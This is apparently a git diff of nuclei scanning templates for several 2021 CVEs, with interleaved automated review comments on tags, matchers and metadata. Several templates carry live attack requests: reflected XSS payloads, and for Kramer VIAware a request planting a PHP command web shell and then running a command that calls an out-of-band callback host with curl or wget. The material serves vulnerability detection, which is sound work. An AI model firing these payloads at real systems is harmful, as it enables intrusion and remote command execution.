CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-35488 cwe-id: CWE-79 + epss-score: 0.00145 + epss-percentile: 0.49429 + cpe: cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: thruk + product: thruk shodan-query: http.html:"Thruk" - verified: "true" - tags: cve,cve2021,thruk,xss + tags: cve2021,cve,thruk,xss -requests: +http: - method: GET path: - "{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -36,5 +48,4 @@ requests: - type: status status: - 401 - -# Enhanced by md on 2022/09/08 +# digest: 4a0a00473045022055819e8cdb5dcdc004233f8a173514f660c7708e98c66aa9920871ec2ca70969022100a7fabd08928656f2dce44bc87916e1e6d23fbe29309f0dff542373be9cf5b065:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2021/CVE-2021-35587.yaml b/nuclei-templates/CVE-2021/CVE-2021-35587.yaml deleted file mode 100644 index 45458baebe..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-35587.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2021-35587 - -info: - name: Pre-auth RCE in Oracle Access Manager - author: cckuailong - description: | - Vulnerability in the Oracle Access Manager product of Oracle Fusion Middleware (component: OpenSSO Agent). Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in takeover of Oracle Access Manager. - severity: critical - reference: - - https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316 - - https://nvd.nist.gov/vuln/detail/CVE-2021-35587 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-35587 - cwe-id: CWE-502 - metadata: - fofa-query: body="/oam/pages/css/login_page.css" - tags: cve,cve2021,oam,rce,java,unauth,oracle - -requests: - - method: GET - path: - - '{{BaseURL}}/oam/server/opensso/sessionservice' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - "x-oracle-dms-ecid" - - "x-oracle-dms-rid" - condition: or - case-insensitive: true - - - type: word - part: body - words: - - "/oam/pages/css/general.css" \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-36356.yaml b/nuclei-templates/CVE-2021/CVE-2021-36356.yaml index 8dbb5f01fd..fc0224ed28 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-36356.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-36356.yaml 
@@ -1,35 +1,21 @@ id: CVE-2021-36356 - info: name: Kramer VIAware - Remote Code Execution author: gy741 severity: critical description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames. - remediation: | - Apply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web interface. reference: - https://www.exploit-db.com/exploits/50856 - https://nvd.nist.gov/vuln/detail/CVE-2021-36356 - https://nvd.nist.gov/vuln/detail/CVE-2021-35064 - https://write-up.github.io/kramerav/ - - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-36356 cwe-id: CWE-434 - epss-score: 0.90558 - epss-percentile: 0.98752 - cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: kramerav - product: viaware - tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav -variables: - useragent: "{{rand_base(6)}}" - -http: + tags: rce,viaware,cve,cve2021,kramer +requests: - raw: - | POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1 
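Review bot: This hunk removes the `intrusive` tag (along with `metadata`, `cpe`, the EPSS fields, the `variables` block and the signing digest) from a template whose first request writes a PHP file under the target's web root and whose second executes a command through it; without `intrusive` the template no longer sits behind the `-etags intrusive` exclusion operators rely on, so the tag should stay: `tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav`. The hunk also reverts `http:` to the legacy `requests:` key and replaces `# digest:` with an `# Enhanced by` trailer, the opposite of the migration every other file in this commit performs, which looks like an older copy of the template overwriting the newer one rather than a deliberate change. The second hunk at `@@ -38,18 +24,12 @@` weakens the matcher in the same direction.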
@@ -38,18 +24,12 @@ http: radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php - | - GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'")}' HTTP/1.1 + GET /{{randstr}}.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://{{interactsh-url}}%22)%7D' HTTP/1.1 Host: {{Hostname}} - - matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol words: - - http + - "http" - - type: word - part: interactsh_request - words: - - "User-Agent: {{useragent}}" -# digest: 490a0046304402207d315039be7b2374857658abe5c9080339493506959d103b741bd2b02930cb020220187d49b26985f25c39c9ba0317f1b0bf0540895f0ee8e3b35b33f10f2b8e4c86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2021/CVE-2021-36450.yaml b/nuclei-templates/CVE-2021/CVE-2021-36450.yaml new file mode 100644 index 0000000000..7220501c25 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-36450.yaml 
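Review bot: Dropping the `interactsh_request` matcher that checked `User-Agent: {{useragent}}` leaves `interactsh_protocol` containing `http` as the only evidence of execution, so any HTTP fetch of the interactsh URL (a link-preview bot or proxy prefetch, for instance) now yields a positive; the per-run random User-Agent was what tied the callback to this template's request. Keep the second matcher together with the `variables` block and `matchers-condition: and`, or at minimum retain some request-side marker that the callback must echo. This is the same reversion described at the first hunk.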
@@ -0,0 +1,55 @@ +id: CVE-2021-36450 +info: + name: Verint 15.2 - Cross Site Scripting + author: atomiczsec + severity: medium + description: Verint Workforce Optimization (WFO) 15.2.8.10048 allows XSS via the control/my_notifications NEWUINAV parameter. + reference: + - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740 + - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-36450 + - http://verint.com + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-36450 + cwe-id: CWE-79 + metadata: + shodan-query: title:"Verint Sign-in" + verified: "true" + tags: cve,cve2021,xss,verint +requests: + - raw: + - | + GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1 + Host: {{Hostname}} + - | + POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}} + redirects: true + max-redirects: 2 + cookie-reuse: true + extractors: + - type: regex + part: header + internal: true + name: csrfp_login + group: 1 + regex: + - 'csrfp_login=([a-zA-Z0-9]+);' + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">

Test

26" class="loginUserNameText' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-3654.yaml b/nuclei-templates/CVE-2021/CVE-2021-3654.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-3654.yaml rename to nuclei-templates/CVE-2021/CVE-2021-3654.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-36580.yaml b/nuclei-templates/CVE-2021/CVE-2021-36580.yaml index 1692211224..a64f0801ce 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-36580.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-36580.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | IceWarp Mail Server contains an open redirect via the referer parameter. This can lead to phishing attacks or other unintended redirects. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Apply the latest security patches or updates provided by IceWarp to fix the open redirect vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-36580 cwe-id: CWE-601 - epss-score: 0.00162 - epss-percentile: 0.52809 + epss-score: 0.00233 + epss-percentile: 0.60652 cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: icewarp product: icewarp_server shodan-query: title:"icewarp" - tags: cve,cve2021,icewarp,redirect + tags: cve2021,cve,icewarp,redirect http: - method: GET 
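Review bot: The new CVE-2021-36450 template uses `verified: "true"` (a quoted string) and the legacy `requests:` key, while the same commit normalises sibling templates to `verified: true` and `http:` with a `max-request` count; it should follow that convention from the start: `verified: true`, `max-request: 2`, `http:`. The body word matcher appears to span several lines in this copy (the marker between `'">` and `26" class="loginUserNameText'`), which looks like extraction damage but is worth confirming in the committed file since a broken multi-line word would never match. Note also that the second request POSTs `username=admin` to the sign-in endpoint, so a scan will leave failed-login entries in the target's auth logs and can trip lockout policies; that is reasonable to call out in `description:` so defenders running it know what to expect.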
@@ -40,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100ef5b5887a6afe9c90bbba13d03f66dff2cb5ea6b90cb882053d3ff6af066a68c022052e701fcd6f081450a3c0ab8fb37f17f625c36ba72ce590f2a616917ebc00a76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201fb7d9f7f3b4cc99c307df40e242a485cec4ec2e1825cb4321b536061d94e5200221009cde712c4679e05357975cbc11bd9caaabcc6fe2ecf21d3d796c06da80f6ed32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-36749.yaml b/nuclei-templates/CVE-2021/CVE-2021-36749.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-36749.yaml rename to nuclei-templates/CVE-2021/CVE-2021-36749.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-36873.yaml b/nuclei-templates/CVE-2021/CVE-2021-36873.yaml index 447b33a1a0..bbc1002cf2 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-36873.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-36873.yaml 
@@ -6,21 +6,31 @@ info: severity: medium description: | WordPress iQ Block Country plugin 1.2.11 and prior contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress iQ Block Country plugin (>=1.2.12) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/ba93f085-2153-439b-9cda-7c5b09d3ed58 - https://wordpress.org/plugins/iq-block-country/ - https://patchstack.com/database/vulnerability/iq-block-country-/wordpress-iq-block-country-plugin-1-2-11-authenticated-persistent-cross-site-scripting-xss-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2021-36873 + - https://wordpress.org/plugins/iq-block-country/#developers classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-36873 cwe-id: CWE-79 + epss-score: 0.00131 + epss-percentile: 0.47179 + cpe: cpe:2.3:a:webence:iq_block_country:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve,wp-plugin,iq-block-country,cve2021,wordpress,wp,xss,authenticated,wpscan + verified: true + max-request: 4 + vendor: webence + product: iq_block_country + framework: wordpress + tags: cve,cve2021,wp-plugin,iq-block-country,wordpress,wp,xss,authenticated,wpscan,webence -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 
@@ -28,28 +38,23 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1 Host: {{Hostname}} - - | POST /wp-admin/options.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded option_page=iqblockcountry-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Diq-block-country%2Flibs%2Fblockcountry-settings.php&blockcountry_blockmessage=test&blockcountry_redirect=2&blockcountry_redirect_url=&blockcountry_header=on&blockcountry_nrstatistics=15&blockcountry_daysstatistics=30&blockcountry_geoapikey=&blockcountry_apikey=&blockcountry_ipoverride=NONE&blockcountry_debuglogging=on - - | GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1 Host: {{Hostname}} - req-condition: true - cookie-reuse: true matchers: - type: dsl dsl: - - contains(all_headers_4, "text/html") + - contains(header_4, "text/html") - status_code_4 == 200 - contains(body_4, 'blockcountry_blockmessage\">test') - contains(body_4, '

Block type

') @@ -62,5 +67,4 @@ requests: regex: - 'name="_wpnonce" value="([0-9a-zA-Z]+)"' internal: true - -# Enhanced by mp on 2022/09/28 +# digest: 490a004630440220684766e6e255bb9e4afa32a94b1ca2dc955141bb09fed41190b572538a9c5c2d02201338c2a3689ac3cc0f55a9edc41183f9d05cac1325b267cd51aa3d1c282ea228:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-36880.yaml b/nuclei-templates/CVE-2021/CVE-2021-36880.yaml index e7a7e6d39a..cac0f9d642 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-36880.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-36880.yaml 
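Review bot: Removing `cookie-reuse: true` in this hunk (and likewise in the CVE-2021-39322 hunk later in this commit) silently depends on the engine persisting the `wp-login.php` session into requests 2–4; I believe recent nuclei versions do that by default for `http:` raw flows, but confirm against the minimum engine version this repository targets, because if cookies are not carried the `body_4`/`status_code_4` assertions can never be satisfied and the template becomes a guaranteed false negative. The `all_headers_4` → `header_4` rename in the DSL should be checked the same way. The enclosing `http:` block starts in the previous hunk.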
@@ -1,31 +1,46 @@ id: CVE-2021-36880 info: - name: uListing < 2.0.4 - Unauthenticated SQL Injection - author: akincibor + name: > + Listing, Classified Ads & Business Directory – uListing <= 2.0.3 - Unauthenticated SQL Injection + author: topscoder severity: critical - description: The plugin does not validate and escape user input leading to an unauthenticated SQL injection issue. + description: > + Unauthenticated SQL Injection (SQLi) vulnerability in WordPress uListing plugin (versions <= 2.0.3), vulnerable parameter: custom. reference: - - https://wpscan.com/vulnerability/7b32e28e-9092-4ecc-95d0-a2b9464b4a9c - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth + - https://www.wordfence.com/threat-intel/vulnerabilities/id/87d153df-93b0-40a3-b119-9fad41fbd0ee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-36880 + metadata: + fofa-query: "wp-content/plugins/ulisting/" + google-query: inurl:"/wp-content/plugins/ulisting/" + shodan-query: 'vuln:CVE-2021-36880' + tags: cve,wordpress,wp-plugin,ulisting,critical -requests: +http: - method: GET + redirects: true + max-redirects: 3 path: - - '{{BaseURL}}/wp-content/plugins/ulisting/README.txt' + - "{{BaseURL}}/wp-content/plugins/ulisting/readme.txt" extractors: - type: regex name: version - internal: true + part: body group: 1 + internal: true regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" - type: regex + name: version + part: body group: 1 regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" matchers-condition: and matchers: @@ -35,9 +50,9 @@ requests: - type: word words: - - "uListing" + - "ulisting" part: body - type: dsl dsl: - - compare_versions(version, '< 2.0.4') \ No newline at end of file + - compare_versions(version, '<= 2.0.3') \ No newline at end of file 
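Review bot: The rewritten `tags:` line drops `cve2021`, `sqli` and `unauth`, so this template falls out of every `cve2021`- or `sqli`-scoped run even though every other CVE-2021 template in this commit carries `cve2021`; suggested `tags: cve,cve2021,wordpress,wp-plugin,ulisting,sqli,unauth`. The new `classification:` block carries metrics and the CVE id but no `cwe-id`, and for a SQL injection `cwe-id: CWE-89` is the expected value. Both extractors are now named `version` (the first `internal: true`, the second not); if the intent is one internal copy for `compare_versions` plus one printed copy, leave the second unnamed so the duplicate name does not shadow or warn.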
diff --git a/nuclei-templates/CVE-2021/CVE-2021-37304.yaml b/nuclei-templates/CVE-2021/CVE-2021-37304.yaml index 0ff4984a8e..b104b46306 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-37304.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-37304.yaml @@ -6,6 +6,8 @@ info: severity: high description: | An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the application. remediation: | Upgrade Jeecg Boot to a version higher than 2.4.5 to mitigate the vulnerability. reference: @@ -16,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-37304 cwe-id: CWE-732 - epss-score: 0.00879 - epss-percentile: 0.80625 + epss-score: 0.00703 + epss-percentile: 0.79899 cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: product: jeecg shodan-query: title:"Jeecg-Boot" fofa-query: title="JeecgBoot 企业级低代码平台" - tags: cve,cve2021,jeecg,exposure + tags: cve2021,cve,jeecg,exposure http: - method: GET @@ -46,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eda8ecb770ddcf5f44a01a37e1fd360ce59e3b4185740f3024680329e4a09fbc022100fd5484fac3810222b19757fe34e6c1e353e2aecfca61a8eef69d40c6ca405217:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022079aca011c64f9f42174da4c2ac2e79327a3b7f9cb9ec87b19a1d1622f87e55f9022100c5af542979ec21dec828b8bd3914169cb6e954bef293666dacc6840bc35c6993:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-37305.yaml b/nuclei-templates/CVE-2021/CVE-2021-37305.yaml index e22366a26d..cedd33c523 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-37305.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-37305.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Jeecg Boot <= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to unauthorized access or data leakage. remediation: | Upgrade Jeecg Boot to version 2.4.6 or later to fix the vulnerability. reference: @@ -16,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-37305 cwe-id: CWE-732 - epss-score: 0.00278 - epss-percentile: 0.64816 + epss-score: 0.00416 + epss-percentile: 0.73616 cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: product: jeecg shodan-query: title:"Jeecg-Boot" fofa-query: title="JeecgBoot 企业级低代码平台" - tags: cve,cve2021,jeecg,exposure + tags: cve2021,cve,jeecg,exposure http: - method: GET @@ -51,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220514fdd1395bfaf1f96b57bae1e793da52e97ecd8fa365204f8937a774e3d98af022100fe04d661a8b30e120f6c5311c61bfc6b726e95e65df4eb2d92e6bc0fdbe290b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204a660859c711b126edb6415cc095e15cfdcb553cef27e02ccc482c2310f22fa5022044fb232b8a52e45910c5e030ec95e0488cdef0e8ee9ad6fa6245217f4879d18b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-37416.yaml b/nuclei-templates/CVE-2021/CVE-2021-37416.yaml new file mode 100644 index 0000000000..3f2ac17b38 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-37416.yaml 
@@ -0,0 +1,38 @@ +id: CVE-2021-37416 +info: + name: Zoho ManageEngine ADSelfService Plus - Reflected XSS + author: edoardottt + severity: medium + description: Zoho ManageEngine ADSelfService Plus version 6103 and prior is vulnerable to reflected XSS on the loadframe page. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-37416 + cwe-id: CWE-79 + metadata: + shodan-query: http.title:"ManageEngine" + verified: true + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-37416 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416 + - https://blog.stmcyber.com/vulns/cve-2021-37416/ + tags: cve,cve2021,zoho,xss +requests: + - method: GET + path: + - "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - "text/html" + - type: word + part: body + words: + - ">" + - "adsf/js/" + condition: and diff --git a/nuclei-templates/CVE-2021/CVE-2021-37859.yaml b/nuclei-templates/CVE-2021/CVE-2021-37859.yaml index 0c6287fe0c..cade6b445d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-37859.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-37859.yaml @@ -1,26 +1,21 @@ id: CVE-2021-37859 - info: name: Mattermost XSS author: 0x_Akoko severity: medium description: reflected Cross-Site Scripting (XSS) via the OAuth flow tags: cve,cve2021,xss - requests: - method: GET path: - "{{BaseURL}}/oauth/shielder/mobile_login?redirect_to=%22%3E%3Cimg%20src%3D%22%22%20onerror%3D%22alert(document.domain)%22%3E" - matchers-condition: and matchers: - - type: word words: - "" part: body condition: and - - type: word words: - "text/html" 
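Review bot: The body word matcher in the new CVE-2021-37416 template reduces to `">"` plus `"adsf/js/"`, and `">` matches essentially any HTML page, so the only discriminating check is the static asset path and the reflected-input condition is effectively untested; if the first word was truncated in this copy, verify the committed file still carries the full reflected marker, otherwise replace it with one that only appears when the `single_signout` value is echoed unescaped. The template also uses `requests:` and lacks `max-request`, unlike the `http:` migration applied to sibling templates in this commit. The `- https://cve.mitre.org/...` reference duplicates the NVD entry and can be dropped.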
diff --git a/nuclei-templates/CVE-2021/cve-2021-38751.yaml b/nuclei-templates/CVE-2021/CVE-2021-38751.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-38751.yaml rename to nuclei-templates/CVE-2021/CVE-2021-38751.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-39141.yaml b/nuclei-templates/CVE-2021/CVE-2021-39141.yaml index a1f0f72337..d42bbcd990 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-39141.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-39141.yaml @@ -20,13 +20,13 @@ info: cve-id: CVE-2021-39141 cwe-id: CWE-434 epss-score: 0.25418 - epss-percentile: 0.96209 + epss-percentile: 0.96584 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2021,xstream,deserialization,rce + tags: cve,cve2021,xstream,deserialization,rce,xstream_project http: - raw: @@ -230,4 +230,4 @@ http: - type: status status: - 500 -# digest: 4a0a0047304502200c3f56ed3fb77680c64c84f8e0144049e83349c419a1ee40e5900d3bf364f9e1022100fee9ad730745ae4e3835e510d2649a4808b98cd40f76d70f23c3541f6055b518:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022053f0426292580652f55e357f2b98bfc3e5eeb27cdf9a41d9687c48bc8ec58bf7022066c4195bc224aeee315f7711243b2ddb5212f9f4a9a41ac581fd5066d8a9b5c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-39144.yaml b/nuclei-templates/CVE-2021/CVE-2021-39144.yaml index a6d7a8c2a8..a19802e392 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-39144.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-39144.yaml 
@@ -6,20 +6,29 @@ info: severity: high description: | XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. + remediation: | + Upgrade XStream to a version that is not affected by CVE-2021-39144. reference: - https://x-stream.github.io/CVE-2021-39144.html - https://github.com/x-stream/xstream/security/advisories/GHSA-j9h8-phrw-h4fh - https://security.netapp.com/advisory/ntap-20210923-0003/ - https://nvd.nist.gov/vuln/detail/cve-2021-39144 + - https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 8.5 cve-id: CVE-2021-39144 - cwe-id: CWE-94,CWE-502 - epss-score: 0.97284 - tags: cve,cve2021,xstream,deserialization,rce,kev + cwe-id: CWE-306,CWE-502 + epss-score: 0.96272 + epss-percentile: 0.99425 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xstream_project + product: xstream + tags: cve2021,cve,xstream,deserialization,rce,kev,xstream_project http: - raw: @@ -78,4 +87,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# Enhanced by cs on 2023/04/17 +# digest: 490a0046304402200e05acfab9074cc5b7b2f6b1f1ba33cf96f6e5fdd55e6e4ff88cea344d39ad3f02205722ce0e0e82affb85fe8a8b2843770329e2cb843008904feebf64127bb7ddc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-39146.yaml b/nuclei-templates/CVE-2021/CVE-2021-39146.yaml index 2777bb081a..6430851191 100644 
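Review bot: The `cwe-id` change from `CWE-94,CWE-502` to `CWE-306,CWE-502` looks wrong for this template: CWE-306 is missing authentication for a critical function, while the unchanged `description:` describes remote code execution through a manipulated input stream, which is what CWE-94/CWE-502 express. Please confirm against the referenced GitHub advisory before keeping `CWE-306`; if the upstream record only lists deserialization, `cwe-id: CWE-502` alone is the safer value. The `kev` tag is correctly retained.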
--- a/nuclei-templates/CVE-2021/CVE-2021-39146.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-39146.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade XStream to a version that is not affected by CVE-2021-39146. reference: @@ -20,13 +22,13 @@ info: cve-id: CVE-2021-39146 cwe-id: CWE-434 epss-score: 0.27391 - epss-percentile: 0.96308 + epss-percentile: 0.96375 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2021,xstream,deserialization,rce + tags: cve2021,cve,xstream,deserialization,rce,xstream_project http: - raw: @@ -117,4 +119,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100d9ed29cd68cd496e6b5c8f4d0e79349e6efc83486ef02d10f786e508ea5e8d20022100e9a1e9b71e9b25547a65b648ed111af54d092566fba5470f275e3c83c7e9ad10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100833e5bcb2f394e9487e537025c26bcfbcc2b936b06eb1849e65851e1d44d86da022100b217b08be73723a93bb1293669baa2cb9859cc6954ad0ac642642a99e07df0d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-39152.yaml b/nuclei-templates/CVE-2021/CVE-2021-39152.yaml index 0e43866740..34ee5c6927 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-39152.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-39152.yaml 
